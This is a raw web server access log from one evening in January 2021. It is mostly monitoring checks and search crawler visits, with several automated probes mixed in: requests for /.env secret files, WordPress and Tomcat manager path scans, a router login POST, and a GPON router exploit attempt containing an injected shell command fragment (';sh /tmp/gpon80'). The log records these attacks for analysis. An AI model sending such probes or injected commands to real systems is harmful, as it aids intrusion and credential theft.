194.146.26.226 - - [08/Jan/2021:18:47:48 +0100] "POST /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:18:48:12 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:18:50:16 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:18:52:19 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:18:54:22 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:18:56:25 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.87 - - [08/Jan/2021:18:56:31 +0100] "GET /event/2009/02/10/day/all/all HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.62 - - [08/Jan/2021:18:56:32 +0100] "GET /event/2008/07/21/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:18:58:28 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
5.255.231.195 - - [08/Jan/2021:18:59:03 +0100] "GET /robots.txt HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.231.195 - - [08/Jan/2021:18:59:07 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
195.56.55.225 - - [08/Jan/2021:19:00:33 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
37.46.150.7 - - [08/Jan/2021:19:01:50 +0100] "HEAD / HTTP/1.0" 200 0 "-" "-"
195.56.55.225 - - [08/Jan/2021:19:02:37 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:04:41 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.239.242.76 - - [08/Jan/2021:19:06:14 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 299 "http://195.56.55.226:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
66.249.64.60 - - [08/Jan/2021:19:06:33 +0100] "GET /event/2008/05/08/week/all/all/1 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:19:06:44 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:08:47 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:10:51 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
1.20.184.238 - - [08/Jan/2021:19:11:05 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:05 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:05 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:06 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:06 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:06 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:06 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:06 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:07 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:07 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 303 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:07 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:07 +0100] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:08 +0100] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:08 +0100] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:08 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:08 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:09 +0100] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:09 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:09 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:09 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 304 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
1.20.184.238 - - [08/Jan/2021:19:11:09 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:19:12:54 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:14:57 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.33 - - [08/Jan/2021:19:16:52 +0100] "GET /event/2009/01/28/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:19:17:00 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:19:06 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:21:12 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
20.197.89.140 - - [08/Jan/2021:19:21:52 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.197.89.140 - - [08/Jan/2021:19:21:52 +0100] "POST / HTTP/1.1" 405 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
178.155.5.221 - - [08/Jan/2021:19:22:26 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.114 YaBrowser/20.11.1.102 Yowser/2.5 Safari/537.36"
178.155.5.221 - - [08/Jan/2021:19:22:57 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:23:32 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
106.13.62.211 - - [08/Jan/2021:19:24:23 +0100] "GET /login HTTP/1.0" 404 265 "-" "-"
106.13.62.211 - - [08/Jan/2021:19:24:23 +0100] "GET /manager/html HTTP/1.0" 404 272 "-" "-"
195.56.55.225 - - [08/Jan/2021:19:25:49 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.62 - - [08/Jan/2021:19:27:02 +0100] "GET /event/2010/08/27/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:19:27:52 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:29:55 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
94.102.49.193 - - [08/Jan/2021:19:30:34 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
94.102.49.193 - - [08/Jan/2021:19:30:36 +0100] "GET /robots.txt HTTP/1.1" 404 287 "-" "-"
94.102.49.193 - - [08/Jan/2021:19:30:37 +0100] "GET /sitemap.xml HTTP/1.1" 404 288 "-" "-"
94.102.49.193 - - [08/Jan/2021:19:30:38 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 301 "-" "-"
94.102.49.193 - - [08/Jan/2021:19:30:42 +0100] "GET /favicon.ico HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
195.56.55.225 - - [08/Jan/2021:19:31:58 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
93.191.100.90 - - [08/Jan/2021:19:33:40 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:19:34:01 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:36:05 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.33 - - [08/Jan/2021:19:37:11 +0100] "GET /event/2010/10/24/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:19:38:08 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:19:38:27 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:39:27 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:39:27 +0100] "-" 408 - "-" "-"
66.249.64.33 - - [08/Jan/2021:19:40:03 +0100] "GET /event/2009/06/22/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:19:40:11 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:19:40:27 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:40:27 +0100] "-" 408 - "-" "-"
27.220.172.171 - - [08/Jan/2021:19:40:30 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 290 "-" "Hello, World"
27.220.172.171 - - [08/Jan/2021:19:40:31 +0100] ";sh+/tmp/gpon80&ipv=0" 501 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:42:14 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:19:42:42 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:42:42 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:44:17 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:46:20 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:19:46:31 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:46:31 +0100] "-" 408 - "-" "-"
66.249.64.62 - - [08/Jan/2021:19:47:03 +0100] "GET /event/2008/05/07/week/all/all/1 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.133.17.136 - - [08/Jan/2021:19:47:54 +0100] "-" 408 - "-" "-"
94.44.248.50 - - [08/Jan/2021:19:48:16 +0100] "-" 408 - "-" "-"
94.44.248.50 - - [08/Jan/2021:19:48:17 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:48:23 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:19:48:43 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:49:50 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:50:26 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.133.17.136 - - [08/Jan/2021:19:51:00 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:51:00 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:51:44 +0100] "-" 408 - "-" "-"
89.133.17.136 - - [08/Jan/2021:19:51:44 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:52:29 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
194.149.63.33 - - [08/Jan/2021:19:53:57 +0100] "-" 408 - "-" "-"
194.149.63.33 - - [08/Jan/2021:19:53:57 +0100] "-" 408 - "-" "-"
195.56.55.225 - - [08/Jan/2021:19:54:32 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:19:56:36 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.85 - - [08/Jan/2021:19:57:01 +0100] "GET /virtualvisualvulgar/szolid%20galeria/pages/20041118%20014.htm HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.62 - - [08/Jan/2021:19:57:02 +0100] "GET /event/2009/04/30/week/all/all HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:19:58:42 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
13.66.139.35 - - [08/Jan/2021:19:58:47 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
195.56.55.225 - - [08/Jan/2021:20:00:45 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
13.67.36.5 - - [08/Jan/2021:20:01:42 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
13.67.36.5 - - [08/Jan/2021:20:01:43 +0100] "POST / HTTP/1.1" 405 310 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:20:02:48 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:04:51 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:06:54 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.60 - - [08/Jan/2021:20:07:02 +0100] "GET /event/2010/10/13/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.88 - - [08/Jan/2021:20:07:03 +0100] "GET /event/2017/11/01/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:20:08:57 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.240.236.119 - - [08/Jan/2021:20:09:18 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
66.240.236.119 - - [08/Jan/2021:20:09:19 +0100] "GET /robots.txt HTTP/1.1" 404 286 "-" "-"
66.240.236.119 - - [08/Jan/2021:20:09:27 +0100] "GET /sitemap.xml HTTP/1.1" 404 287 "-" "-"
66.240.236.119 - - [08/Jan/2021:20:09:28 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 300 "-" "-"
66.240.236.119 - - [08/Jan/2021:20:09:31 +0100] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
195.56.55.225 - - [08/Jan/2021:20:11:00 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
107.6.168.210 - - [08/Jan/2021:20:11:26 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:20:13:03 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
167.114.175.39 - - [08/Jan/2021:20:13:38 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:20:15:07 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:17:10 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.87 - - [08/Jan/2021:20:17:11 +0100] "GET /event/2008/05/08/week/all/all/1 HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
81.183.148.32 - - [08/Jan/2021:20:17:18 +0100] "-" 408 - "-" "-"
66.249.64.88 - - [08/Jan/2021:20:17:21 +0100] "GET /event/2017/07/08/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:20:19:14 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:21:18 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:23:30 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:25:50 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.60 - - [08/Jan/2021:20:27:02 +0100] "GET /event/2017/03/31/week/all/all HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.89 - - [08/Jan/2021:20:27:03 +0100] "GET /event/2010/12/01/table/all/all HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:20:27:54 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:29:58 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:32:02 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:34:05 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:36:10 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.33 - - [08/Jan/2021:20:37:11 +0100] "GET /event/2010/02/15/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.33 - - [08/Jan/2021:20:37:12 +0100] "GET /event/2018/12/26/table/all/all HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:20:38:13 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:40:16 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
122.51.164.98 - - [08/Jan/2021:20:42:07 +0100] "GET /login HTTP/1.0" 404 265 "-" "-"
122.51.164.98 - - [08/Jan/2021:20:42:07 +0100] "GET /manager/html HTTP/1.0" 404 272 "-" "-"
195.56.55.225 - - [08/Jan/2021:20:42:20 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:44:23 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.102.8.119 - - [08/Jan/2021:20:45:46 +0100] "GET / HTTP/1.1" 304 - "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
157.119.212.33 - - [08/Jan/2021:20:46:00 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.56.55.225 - - [08/Jan/2021:20:46:27 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.33 - - [08/Jan/2021:20:47:21 +0100] "GET /event/2008/03/02/day/all/all HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.88 - - [08/Jan/2021:20:47:22 +0100] "GET /event/2019/12/07/day/all/all HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.56.55.225 - - [08/Jan/2021:20:48:31 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:50:34 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:52:37 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [08/Jan/2021:20:54:40 +0100] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
71.6.165.200 - - [08/Jan/2021:20:56:31 +0100] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.165.200 - - [08/Jan/2021:20:56:32 +0100] "GET /robots.txt HTTP/1.1" 404 296 "-" "-"
71.6.165.200 - - [08/Jan/2021:20:56:33 +0100] "GET /sitemap.xml HTTP/1.1" 404 297 "-" "-"
71.6.165.200 - - [08/Jan/2021:20:56:34 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 310 "-" "-"
